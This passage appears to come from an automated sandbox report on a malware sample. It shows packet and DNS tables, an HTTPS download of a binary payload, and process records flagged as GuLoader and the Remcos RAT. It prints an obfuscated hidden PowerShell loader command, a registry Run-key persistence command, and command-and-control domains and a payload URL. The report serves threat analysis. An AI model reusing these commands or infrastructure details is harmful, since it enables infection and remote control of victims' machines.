Oct 6, 2024 11:47:05.205673933 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.205785036 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.205785036 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.205950022 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.205950022 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.205950022 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.206037998 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.206250906 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.206605911 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.206692934 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.206867933 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.206939936 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.206964970 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.207212925 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.207740068 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.207827091 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.207938910 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.207940102 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.207940102 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.208015919 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.208054066 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.208172083 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.208239079 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.208784103 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.208802938 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.208939075 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.209076881 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.209084988 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.209103107 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.209117889 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.209135056 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.209275007 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.209275007 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.209424973 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.209444046 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.209613085 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.210342884 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.210364103 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.210516930 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.210516930 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.210545063 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.210561991 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.210654974 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.210728884 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.210740089 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.210843086 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.210908890 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.210908890 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.210938931 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.211169958 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:10.254287958 CEST	49769	3980	192.168.11.20	192.169.69.26
Oct 6, 2024 11:47:10.533413887 CEST	3980	49769	192.169.69.26	192.168.11.20
Oct 6, 2024 11:47:10.533767939 CEST	49769	3980	192.168.11.20	192.169.69.26
Oct 6, 2024 11:47:10.534594059 CEST	49769	3980	192.168.11.20	192.169.69.26
Oct 6, 2024 11:47:10.745951891 CEST	3980	49769	192.169.69.26	192.168.11.20
Oct 6, 2024 11:47:10.858428001 CEST	49770	3981	192.168.11.20	45.74.58.7
Oct 6, 2024 11:47:11.871938944 CEST	49770	3981	192.168.11.20	45.74.58.7
Oct 6, 2024 11:47:13.887119055 CEST	49770	3981	192.168.11.20	45.74.58.7
Oct 6, 2024 11:47:17.901822090 CEST	49770	3981	192.168.11.20	45.74.58.7
Oct 6, 2024 11:47:25.915685892 CEST	49770	3981	192.168.11.20	45.74.58.7
Oct 6, 2024 11:47:33.058794975 CEST	49773	3980	192.168.11.20	192.169.69.26
Oct 6, 2024 11:47:33.264039993 CEST	3980	49773	192.169.69.26	192.168.11.20
Oct 6, 2024 11:47:33.264236927 CEST	49773	3980	192.168.11.20	192.169.69.26
Oct 6, 2024 11:47:33.265039921 CEST	49773	3980	192.168.11.20	192.169.69.26
Oct 6, 2024 11:47:33.471057892 CEST	3980	49773	192.169.69.26	192.168.11.20
Oct 6, 2024 11:47:33.472913980 CEST	49774	3981	192.168.11.20	45.74.58.7
Oct 6, 2024 11:47:34.476418972 CEST	49774	3981	192.168.11.20	45.74.58.7
Oct 6, 2024 11:47:36.491615057 CEST	49774	3981	192.168.11.20	45.74.58.7
Oct 6, 2024 11:47:40.506438017 CEST	49774	3981	192.168.11.20	45.74.58.7
Oct 6, 2024 11:47:48.520194054 CEST	49774	3981	192.168.11.20	45.74.58.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 6, 2024 11:47:02.905457973 CEST	57277	53	192.168.11.20	1.1.1.1
Oct 6, 2024 11:47:03.312587023 CEST	53	57277	1.1.1.1	192.168.11.20
Oct 6, 2024 11:47:10.142237902 CEST	59893	53	192.168.11.20	1.1.1.1
Oct 6, 2024 11:47:10.252559900 CEST	53	59893	1.1.1.1	192.168.11.20
Oct 6, 2024 11:47:10.747122049 CEST	54980	53	192.168.11.20	1.1.1.1
Oct 6, 2024 11:47:10.856147051 CEST	53	54980	1.1.1.1	192.168.11.20
Oct 6, 2024 11:47:31.934254885 CEST	55610	53	192.168.11.20	1.1.1.1
Oct 6, 2024 11:47:32.045561075 CEST	53	55610	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 6, 2024 11:47:02.905457973 CEST	192.168.11.20	1.1.1.1	0xe710	Standard query (0)	simonastolerciuc.ro	A (IP address)	IN (0x0001)	false
Oct 6, 2024 11:47:10.142237902 CEST	192.168.11.20	1.1.1.1	0xcfa1	Standard query (0)	janbours92harbu03.duckdns.org	A (IP address)	IN (0x0001)	false
Oct 6, 2024 11:47:10.747122049 CEST	192.168.11.20	1.1.1.1	0x76dc	Standard query (0)	janbours92harbu04.duckdns.org	A (IP address)	IN (0x0001)	false
Oct 6, 2024 11:47:31.934254885 CEST	192.168.11.20	1.1.1.1	0x3008	Standard query (0)	janbours92harbu007.duckdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 6, 2024 11:47:03.312587023 CEST	1.1.1.1	192.168.11.20	0xe710	No error (0)	simonastolerciuc.ro		85.120.16.93	A (IP address)	IN (0x0001)	false
Oct 6, 2024 11:47:10.252559900 CEST	1.1.1.1	192.168.11.20	0xcfa1	No error (0)	janbours92harbu03.duckdns.org		192.169.69.26	A (IP address)	IN (0x0001)	false
Oct 6, 2024 11:47:10.856147051 CEST	1.1.1.1	192.168.11.20	0x76dc	No error (0)	janbours92harbu04.duckdns.org		45.74.58.7	A (IP address)	IN (0x0001)	false
Oct 6, 2024 11:47:32.045561075 CEST	1.1.1.1	192.168.11.20	0x3008	Name error (3)	janbours92harbu007.duckdns.org	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

simonastolerciuc.ro

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49768	85.120.16.93	443	1264	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-06 09:47:03 UTC	189	OUT	GET /images/vnlXriHFWaBU97.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: simonastolerciuc.ro Cache-Control: no-cache
2024-10-06 09:47:04 UTC	499	IN	HTTP/1.1 200 OK Connection: close content-type: application/octet-stream last-modified: Mon, 30 Sep 2024 01:47:33 GMT accept-ranges: bytes content-length: 494656 date: Sun, 06 Oct 2024 09:47:03 GMT server: LiteSpeed vary: User-Agent referrer-policy: no-referrer-when-downgrade access-control-allow-origin: * alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-06 09:47:04 UTC	869	IN	Data Raw: 1b f0 98 8a a9 39 84 a2 13 c7 e4 90 6a af 05 04 86 9e 38 0a 69 86 9a cc 4d b2 2c c3 cf 8c 2e 3c c4 d1 85 ef 2a ec 9b 11 53 e6 81 f2 10 2a a4 36 8a 80 06 bd d7 04 c6 81 8e 0a ca 9b 8c bc be cc f6 3b 02 9f 74 f3 2b 86 da ff 13 be be 6a 27 a1 fc 70 37 2b 3c 5b b0 92 48 08 e1 a9 8e d2 f0 73 84 6e 43 6d 92 9a a2 a9 71 96 95 ed c1 c0 7c 17 59 54 2a 99 52 fc e9 89 dd 60 95 fa 86 21 eb c7 0c cd 25 5f 13 ee 4b b0 9a cc 5c dc a1 7d bd aa 6e 3b 00 17 24 8c 02 99 48 35 22 89 8d a2 a2 15 22 78 0f 82 ba f7 59 91 51 80 e1 9e 86 1e a6 d8 be 06 76 0d 45 96 57 a1 1e 11 c5 dc bb 9a 9f 52 38 cb 73 21 81 7d 8b cd c9 f7 fb 53 b1 6b cc 4b 36 0d 2c 6b d5 eb 5f 25 2d 7f ba 9d 99 e9 28 7e b5 7f e0 7a a3 1b 72 e0 37 26 3b 0b fd 93 f5 b9 b0 65 0e 6e 43 e5 d1 1f ec d9 d3 78 00 55 38 Data Ascii: 9j8iM,.<S6;t+j'p7+<[HsnCmq\|YT*R`!%_K\}n;$H5""xYQvEWR8s!}SkK6,k_%-(~zr7&;enCxU8
2024-10-06 09:47:04 UTC	14994	IN	Data Raw: 49 e5 d4 6a 60 62 5e ad 02 85 76 9a 4f f3 1d 4c 90 f6 16 88 3b 82 7c f7 00 fb 78 fe 45 58 68 31 0a 86 43 79 3e 22 7c 53 fa 85 58 02 78 58 45 8f 5f c8 c2 ab 10 eb 47 d5 30 4a 18 92 35 a8 ee f8 8b e9 38 93 3c 32 ad f5 00 c2 9f f0 79 23 da 0e 42 a0 8b ff ea 23 e6 2d 93 e7 ba a2 b1 85 f0 72 ef fc 36 51 8b 0b 50 2f b6 40 f1 0e 4d b2 8f 73 99 ce c0 be d1 9d f3 10 82 66 f6 4c c5 bd 35 94 9b dc fa 53 f1 b9 02 48 99 49 79 20 83 cc 7a 67 89 12 c7 30 ba 6d 72 db bf 25 f9 e5 cd c2 0c 8f 52 8a 0b 38 e4 a9 a7 9b 9d 02 b6 93 3b 13 aa 96 4a 0e ab f3 22 22 0f ea eb 49 6c 3e f7 4c c0 5c 46 ba 93 22 fd d9 8e 3e 27 67 69 55 48 ec f1 12 0c 11 97 5f 6b 4b c8 cb c4 2b 3b f8 30 3a a0 b3 28 0f 16 d7 b2 44 df 7a 41 65 64 86 d6 c2 86 75 af 13 6e 7c 2b b3 65 20 04 6a 84 31 a6 6b aa Data Ascii: Ij`b^vOL;\|xEXh1Cy>"\|SXxXE_G0J58<2y#B#-r6QP/@MsfL5SHIy zg0mr%R8;J""Il>L\F">'giUH_kK+;0:(DzAedun\|+e j1k
2024-10-06 09:47:04 UTC	16384	IN	Data Raw: d3 d2 37 8f 05 e4 3c e6 1c f1 7a 5c ce db 69 4f 39 ed 2b 25 9b 19 58 14 48 64 7c 42 7d 2e a5 0b 54 e1 a0 61 e8 ba 9f c7 6b ad 4e af 03 65 ab ff bd 80 bb b0 75 10 af 47 ef 6a ed 7b 76 3a 56 53 e5 fe a7 62 c9 be bd f8 cd 4a 53 02 48 da 0e 30 d1 0f 89 b6 4e 45 86 8a 1f 51 16 c8 f9 0b e7 9d 11 07 bc fb c2 d7 70 a7 ab 84 b1 9d 6d 52 ac ed f9 9e df 6e 51 7d 4e 4b 51 f0 f6 b5 13 c6 c1 a1 1e 55 96 1a 81 cd 73 7f ad cd 23 fe 0e 7a 42 5c 4d e8 18 5d 85 eb 7e 50 8e 0a 1e da ea 98 32 78 b8 12 23 b2 85 3d 5f c6 65 b0 07 c3 8c fc 22 2f df ff 08 51 bb ed 70 2d 93 23 d9 9d 65 87 78 cc 21 ac 6e cc 11 2f 1d ba e0 6b a0 97 7a ee fd ed 52 16 25 76 f6 08 6c 24 9a 86 13 76 f4 dc 28 34 b9 ba b4 03 34 33 03 40 9b b2 b7 4e 71 08 05 7f 33 ca ad 9e bf 03 07 be 18 59 b0 e2 90 94 f0 Data Ascii: 7<z\iO9+%XHd\|B}.TakNeuGj{v:VSbJSH0NEQpmRnQ}NKQUs#zB\M]~P2x#=_e"/Qp-#ex!n/kzR%vl$v(443@Nq3Y
2024-10-06 09:47:04 UTC	16384	IN	Data Raw: c7 f2 23 ff 4f 26 55 66 26 d3 10 fe cc 2b 5e 54 69 b3 55 a8 e5 56 16 95 05 72 f1 23 dd 1c ac 8b 58 e9 72 6d ba ab 9e 3f 8d 1e b8 61 f1 9c 38 ca 92 68 8a ce 1e 6c 9f 5a 7b 64 c4 7d 5f 0e 22 ea 4f 0e 8e 25 04 9f 8f 1a bd 1e 3a 39 6a 01 6a dd 92 0a 22 7a 1e a3 a3 90 75 5c 89 37 82 d7 31 27 8b 73 24 33 1a 20 1a b1 30 b6 39 23 2a 97 00 ff 3c c2 6a 46 76 d3 62 9d 79 02 31 bc 71 c8 18 ab a9 91 59 69 a0 39 8d 2f a8 8a 01 32 7a f7 92 26 13 46 39 a5 0c 9f 84 fa 0c 8e 68 94 26 e1 d9 7e 65 78 11 46 5e ba e0 65 01 87 19 81 01 0a f2 dd 68 be 1a 45 07 24 8d e7 34 4f 1c 3d 79 fb 74 ca ea b3 8a 29 2b 6a 60 a7 7a 57 d8 8b 51 d6 ea dc fa d6 c5 c3 b6 4d 7d dc dd f5 2c 6b 0b c7 9b 8f 0a f8 08 60 51 ca f8 fa 72 bc ee 0f 94 53 62 28 01 bb 04 b9 1f 29 80 18 24 48 28 8d 47 5c 3a Data Ascii: #O&Uf&+^TiUVr#Xrm?a8hlZ{d}_"O%:9jj"zu\71's$3 09#*<jFvby1qYi9/2z&F9h&~exF^ehE$4O=yt)+j`zWQM},k`QrSb()$H(G\:
2024-10-06 09:47:04 UTC	16384	IN	Data Raw: 9a d4 e1 f0 75 9e ae 8d 8d 60 f1 e8 43 e6 89 b8 38 fd 7d 7a 31 ad f1 85 a8 09 6e 19 98 06 57 85 bd dc 65 ab 54 fd a6 e3 98 39 16 bd 9a ed 5f 87 67 d9 49 53 7a c8 b7 58 04 39 2b c2 9a 8f 24 01 e2 3d 31 14 52 24 cf 19 c0 52 36 70 4c 9c a0 29 79 ae 2a 3f 71 76 30 c2 61 02 d1 91 0f 0d 22 5a b1 68 58 38 fe 81 e7 0c 64 a9 b1 e0 ad 39 3c 51 c5 65 70 2d 53 c7 d9 89 7c 7e a8 2f 17 1b e9 9b 06 c3 8b ce d1 b8 a4 8c f0 22 95 a5 86 9e cd a2 f2 de 93 85 b0 6e 79 9f 26 03 13 fb 47 f1 3a b0 5d 80 a1 7d 14 ba 0a 2e c1 74 16 66 24 b8 fe 66 5f 05 80 5a 27 c7 96 e2 e4 f6 1c ef 4a 3d fd 2b 20 d0 aa 42 70 84 92 14 61 99 58 6c 2d 61 39 eb b8 52 a5 d6 5a c0 1f 01 dc 6a 22 5d 69 81 02 72 90 6e 48 2d 27 60 d4 65 54 51 72 d1 bf f3 61 1f 4f a0 49 b9 03 ee 25 5c f5 19 9b d6 0a 70 c8 Data Ascii: u`C8}z1nWeT9_gISzX9+$=1R$R6pL)y*?qv0a"ZhX8d9<Qep-S\|~/"ny&G:]}.tf$f_Z'J=+ BpaXl-a9RZj"]irnH-'`eTQraOI%\p
2024-10-06 09:47:04 UTC	16384	IN	Data Raw: 0d 83 f3 1a b3 92 3a 39 62 25 9a 83 77 78 98 d1 3a 6f 39 bd 85 28 2c 4d 8d 66 43 9c ff d6 3f 95 f3 2e 20 02 eb de 5c ac 38 e5 b2 e8 1c e5 df 6f 89 af de 61 9f 35 63 54 d9 a4 f7 6f d3 2f 91 d3 ff 04 f9 b5 e9 34 83 fa b4 e0 ad 4d bf d3 da b5 c3 f6 48 ed 18 51 82 f3 5d e5 26 0c d7 7f f8 b6 08 cf c7 65 00 ab d9 ca 20 e0 f2 af af 5d 19 dc 23 da 2d 34 24 2c 7f ba b1 c7 de f1 07 09 3c ab 52 83 cc e4 69 34 92 1f 29 6c bb cb 72 53 0e 06 14 8f 18 b6 6a 1d 6f 75 89 30 93 3d 76 27 e9 b1 a2 bc 28 4b 02 d9 cf 93 e2 f1 e7 35 b4 16 d3 a5 bd da e2 8f 47 f1 6b eb ce d2 fe c7 de 35 0a eb cf 2b ad 1d 23 f8 dc f2 f8 22 cb 76 e0 95 d2 df c4 fb 01 65 ea 15 3f 24 23 29 08 de 0d 04 1c 5f 2a 84 1b a4 06 e4 95 e8 ad a7 8c 98 2e 48 4e 17 d2 fd a0 b9 53 12 86 38 a1 3d 46 53 e7 5c 03 Data Ascii: :9b%wx:o9(,MfC?. \8oa5cTo/4MHQ]&e ]#-4$,<Ri4)lrSjou0=v'(K5Gk5+#"ve?$#)_*.HNS8=FS\
2024-10-06 09:47:04 UTC	16384	IN	Data Raw: b1 41 4a 56 b4 76 22 91 45 ea 98 29 79 b0 b7 52 fa 87 77 23 14 5e e2 46 c0 54 23 b3 bb e9 a0 39 b4 f4 68 b6 9c fc 9e 1b 50 c6 e6 01 ed 1f 8f d2 91 f0 5b 71 7d 87 ec ac 5c 28 5c d5 7a c7 ca 31 0b 6b b7 8d 85 2d 16 0e 0e 24 2f 26 ce f9 93 db 9b bf 78 77 f4 d4 ac 08 02 3e cf 78 36 8a 7a c2 1a 60 ed 41 69 8b e9 5f 0a 96 77 51 62 a6 1a e0 18 62 c7 1f 6f f1 43 f0 95 06 0e 9b 20 d0 8a bc 39 93 42 d4 b2 9b 1e 95 be 9a 2c db bb 69 e0 d9 05 18 2a de 55 ad ea 4d 35 60 95 72 b1 ba d3 be d9 4d d3 c9 f8 3e 4d 17 70 27 a8 65 33 e3 a5 01 27 7d 03 11 7f 4f 64 91 7a 8a 41 8d b3 76 8a c0 70 66 dd cf 19 35 6e 2c bf fe 18 3f 03 b4 8f c0 dc 9d 39 66 62 ff b6 06 0a d6 52 2c 3f 56 d6 8e c5 d5 cb 50 ae 4b 6a 53 f4 52 d4 bc 35 01 50 1e 3b 3c b3 cf b9 a4 42 71 24 13 1b 6e f5 02 2a Data Ascii: AJVv"E)yRw#^FT#9hP[q}\(\z1k-$/&xw>x6z`Ai_wQbboC 9B,iUM5`rM>Mp'e3'}OdzAvpf5n,?9fbR,?VPKjSR5P;<Bq$n
2024-10-06 09:47:04 UTC	16384	IN	Data Raw: e9 02 f9 60 65 f3 4a 3f 6b 39 d2 38 8f 59 b4 55 b2 5b ea f2 4b ce 97 78 e7 24 35 fc 35 ba f6 30 4c 8f f1 af d8 39 e5 ad b3 60 0d e6 ce cf 06 5b 86 02 e4 d2 a9 fb 74 0f e7 a7 ca de 0e 0f da 2e b2 48 d8 3f b9 d2 25 78 aa fd c4 8c 4a b2 a0 1c 24 d1 87 2a 61 c6 e9 4f 4f f4 8c 36 3b cb 8a 5c 7c d9 cf 93 3b 21 ba d1 b4 1e cb c4 46 d6 b2 d8 f6 55 51 a4 02 b9 8b 42 ab 04 78 d3 27 3c 47 80 22 72 48 25 ec 68 34 8e a5 f6 4f 43 fc bb fc ef bf 4b f2 0a a8 aa 6d b8 cc 00 36 e0 74 3f fb 17 56 d3 fc f8 d2 2e 22 f9 44 13 c5 a2 02 6a 34 34 48 1d 9f 9b fa bd f5 0a 19 88 bd 14 85 26 5a f8 71 8b eb cf 0d 18 b3 fe 7d 08 4e 25 7d 73 45 65 3e 1c 77 11 9f e6 99 98 b9 e5 d2 9e 4f 5e 3f ee 56 df cc c0 65 19 61 ef e3 33 dc 2a 66 6e 72 c9 51 de e8 73 53 b5 18 19 ad 4a ac 7b c5 4e 67 Data Ascii: `eJ?k98YU[Kx$550L9`[t.H?%xJ$aOO6;\\|;!FUQBx'<G"rH%h4OCKm6t?V."Dj44H&Zq}N%}sEe>wO^?Vea3fnrQsSJ{Ng
2024-10-06 09:47:04 UTC	16384	IN	Data Raw: 69 23 95 f5 e5 19 70 60 0d 53 1f ff c2 6b 79 77 1c 62 b9 fa 74 f7 67 7c 77 d7 5e 82 77 83 b7 3b 62 74 9d 7b 6c 63 2f 98 0a aa 02 5a d2 c4 97 e2 e2 b2 d0 58 fe db 57 ee 9b 79 e2 11 0d 5f 42 01 74 64 e6 20 cb f5 39 53 2f c4 e4 83 4c 27 22 89 f8 41 ce 51 3a 3f ad af 0b 61 4e 98 fc 0d 34 62 74 f3 72 69 f3 47 cc 7e a7 27 2c 45 30 a5 ba e4 2f 1f e9 6d a5 84 11 00 de 3b 7f c1 70 e3 56 ec e3 c2 b1 02 35 c9 60 83 80 f2 b2 3c a9 b9 05 96 f2 24 df bc f5 ac e6 7c 20 a6 b4 43 89 78 bf ff 7c 14 35 97 15 e8 0f 21 fc fe 14 f1 aa ba 0f 0b 3c 5a a7 47 49 54 99 b6 0f 76 0e 08 92 47 8c 19 b2 ab b5 8c 90 94 f0 be b0 d5 1a 78 9b e8 40 a7 17 fe 1e fa 19 3e 4c c0 d0 1f 89 8e b3 a3 5b 59 96 29 48 87 42 db 02 c4 7c c4 a5 7d 6b 08 48 27 c0 e7 9b 9e 06 1c bf 24 25 22 d2 bd b3 84 2e Data Ascii: i#p`Skywbtg\|w^w;bt{lc/ZXWy_Btd 9S/L'"AQ:?aN4btriG~',E0/m;pV5`<$\| Cx\|5!<ZGITvGx@>L[Y)HB\|}kH'$%".
2024-10-06 09:47:04 UTC	521	IN	Data Raw: 9d 0c 6f 2b bf 15 cb dd 0a 39 fe c1 81 b5 1f fe f4 61 93 02 0d 95 38 f5 ae 35 1f bb df ff 0a 9b 6b ac 62 e6 91 53 2f 2c b5 86 5a 72 f0 04 dc 6a 0a 5d b9 ab 71 d7 f5 eb db 2b ac 31 f4 dc ab 03 d8 c6 ea 74 e8 6a 24 e7 20 c0 c3 6a 6f 91 7e 4f 64 a2 ed 84 59 08 a5 10 0f 23 70 e3 06 b4 ab f3 95 a3 99 bc fb 1c 95 1a c2 4f a8 b9 5c 1c b7 60 a7 42 0b 53 92 d5 b3 c9 61 ce cd b5 21 74 b2 44 58 65 09 35 7b a2 3d 59 b4 19 08 ee 9b f4 33 de d6 5c 14 58 0e 0e 5a 9e 88 a4 c1 11 58 56 44 ad 9c 83 1a df 6e be b0 50 66 9e 1e 7f 3a df e8 73 9d f9 f0 3f 38 39 00 b6 61 8a 71 df 4d dd 6f d8 c3 88 f5 9e 68 48 ac 48 36 f8 f7 88 8d 29 86 e7 2a fe 93 ed c5 07 fd e9 94 d7 d7 c1 4e 9e 76 f2 8c aa 6f 3e 66 98 3f 6e 2c bf 56 e5 e6 20 49 5e 29 66 4c 12 01 11 b4 f0 d7 8d 65 16 2d c6 56 Data Ascii: o+9a85kbS/,Zrj]q+1tj$ jo~OdY#pO\`BSa!tDXe5{=Y3\XZXVDnPf:s?89aqMohHH6)*Nvo>f?n,V I^)fLe-V

Target ID:	0
Start time:	05:46:28
Start date:	06/10/2024
Path:	C:\Users\user\Desktop\zR4aIjCuRs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\zR4aIjCuRs.exe"
Imagebase:	0x400000
File size:	776'478 bytes
MD5 hash:	02F086FB54D58BF17B51564B34166F5E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:46:29
Start date:	06/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle hidden "$Sudadero=Get-Content -Raw 'C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Falkespors.Var';$Maalkastets=$Sudadero.SubString(54266,3);.$Maalkastets($Sudadero) "
Imagebase:	0x860000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.274416296042.000000000A9BD000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:46:29
Start date:	06/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ab9d0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:46:54
Start date:	06/10/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\syswow64\msiexec.exe"
Imagebase:	0x760000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:46:54
Start date:	06/10/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\syswow64\msiexec.exe"
Imagebase:	0x760000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:46:54
Start date:	06/10/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\syswow64\msiexec.exe"
Imagebase:	0x760000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.274580776368.0000000006A5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.274580776368.0000000006A11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:47:01
Start date:	06/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)"
Imagebase:	0xa60000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:47:01
Start date:	06/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ab9d0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
